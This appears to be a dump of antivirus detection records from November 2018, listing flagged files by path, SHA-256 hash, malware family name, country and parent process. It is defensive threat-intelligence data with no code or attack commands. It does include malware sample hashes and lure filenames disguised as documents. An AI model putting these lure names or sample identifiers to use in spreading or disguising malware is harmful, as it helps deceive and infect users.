  Row(detection=Row(filename='avscan-20181102-051914-cf20c350', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051914-CF20C350', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055953-7ca62ade', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055953-7CA62ADE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055423-b849f993', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055423-B849F993', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051404-16995fe9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051404-16995FE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053438-f6079692', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053438-F6079692', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060628-684ddb63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060628-684DDB63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Photoshop CS\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='7c0fd739d6331bb17b1ea17165f74028cef9725ec40aa8afb17fccfd6bfd453a', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:21:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051119-b43c7596', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051119-B43C7596', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='7e59ec1097acb9cbb852cf8ed34c754f9d8f2d9d27c6dd1ae4d718bd0a18dd15', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T11:20:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054340-38e47dbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054340-38E47DBE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053446-fadbf6f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053446-FADBF6F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051405-16bb405c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051405-16BB405C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-122939-a3e18b4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5bb8b3e\\AVSCAN-20181101-122831-9B26EEA7\\AVSCAN-20181101-122939-A3E18B4E', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:29:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154856-7a6ab3b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154856-7A6AB3B1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152456-3d582503', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152456-3D582503', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:24:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155812-d80b7327', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155812-D80B7327', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='peb0312.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\PEB0312\\PEB0312.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152017-1689a3b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152017-1689A3B4', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oldfunk.exe', filepath='D:\\OLDFUNK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='enviar malote feit o em 11 06 .scr', filepath='C:\\Users\\X\\Desktop\\enviar malote feit o em 11 06 .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154833-768fab33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154833-768FAB33', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pkwt ok.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\PKWT\\PKWT OK\\PKWT OK.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170704-8fda578d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-170558-84D52381\\AVSCAN-20181101-170704-8FDA578D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T23:44:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T02:42:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='16c977ca644806d602791e55439706c73477ae11663d05c4ae4202e95da5ae70', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7867A1B7-AB4F-4FAF-8BE8-E64B0D8AA5B0}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='21e07b31f103951d4648e184e7fbb717f1f0d6d41d7e45fb361438819bc14bb3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3bbcddfbcb55c2d2e07841ad444d207fef8aad19af1ad587835534f57b500ec6', metadata=Row(cmdline='-k netsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-20-16-02.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T19:21:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:54:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153140-c9bdb301', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_787b8ae0\\AVSCAN-20181101-153123-C7455240\\AVSCAN-20181101-153140-C9BDB301', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084729-fa7c0fc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1735652b\\AVSCAN-20181101-084513-DF755581\\AVSCAN-20181101-084729-FA7C0FC5', filesize=592000, name='PUA/DownloadGuide.Gen.#M1.#R1'), hash='11333b43e18e6e5657fd43852fac142f194637af5854020ee1e4338ab47054e5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:47:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-051723-2f189a85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ae015d2\\AVSCAN-20181101-050240-D2C7AF4B\\AVSCAN-20181101-051723-2F189A85', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='cea6bf0c2b35e49bab605d19ad6fb1011d923f4971251990183bd55d1895eaa1', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:17:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{DC7A9AF2-4E10-4F1C-BF23-AD934E0E5040}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='eaab00b64e7d7aca87ce13f2be71c5458af144a015a4909dccc13912705745a8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recdisc.exe', filepath='\\\\?\\C:\\Windows\\system32\\recdisc.exe', filesize=416000, name='W32/Parite.#M1.#R1'), hash='5683b16d456ee592c57330c0e2a0453cec770378c8697d78dfbffa5581b59966', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:42:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155619-21db2c67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a61424c1\\AVSCAN-20181101-155556-1F24BC55\\AVSCAN-20181101-155619-21DB2C67', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:56:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T18:38:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='researchdownload.exe', filepath='E:\\ADAVAN\\ResearchDownload_R2.10\\ResearchDownload_R2.10\\ResearchDownload.exe', filesize=2052000, name='W32/Ramnit.C.#M1.#R1'), hash='e58245c0f2770145584022562683304ad777e7eb1ec9d10829d322294e8f9cc1', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ikIi1uqJfke5GSVU.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T02:40:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111930-3b1d338d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111930-3B1D338D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e72aafea9c8d894b6a31480c29bc1d7fa212179018f8cc4fc1d7dcec5a36d9b5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E72AAFEA9C8D894B6A31480C29BC1D7FA212179018F8CC4FC1D7DCEC5A36D9B5', filesize=900000, name='W32/Sivis.A.#M1.#R1'), hash='e72aafea9c8d894b6a31480c29bc1d7fa212179018f8cc4fc1d7dcec5a36d9b5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:37:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190829-136bfe54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190829-136BFE54', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='\\\\?\\C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a17d51471e68aa036792002d09d08b75e483d84eda16739098d3cc5d522feabd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='collagephoto.exe', filepath='G:\\dexati\\collagephoto.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:50:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='службная записка ключи от зала ихибт.exe', filepath='E:\\УФКиС\\служебные записки\\службная записка ключи от зала ИХИБТ.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='723781da9dd34e794ac7e9f373408d9f8cc1c9f50fad6abc9d7368b3b2926654', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:12:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b6dac19334c9d1257735429ab4490648eb9942d34381f25953d79514aa6d05aa', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B6DAC19334C9D1257735429AB4490648EB9942D34381F25953D79514AA6D05AA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b6dac19334c9d1257735429ab4490648eb9942d34381f25953d79514aa6d05aa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cool_video.exe', filepath='G:\\Cool_Video.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC E-GOVERNANCE SERVICES INDIA LIMITED\\DIGIPAY\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-01T09:37:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered rinit', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered rinit', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='b291d04a513b0ba38ef40083d66fc8ef5ca7e686c9d27100ec812d5f5223cb24', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:38:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:54:19Z'), dt=datetime.date(2018, 11, 1)),
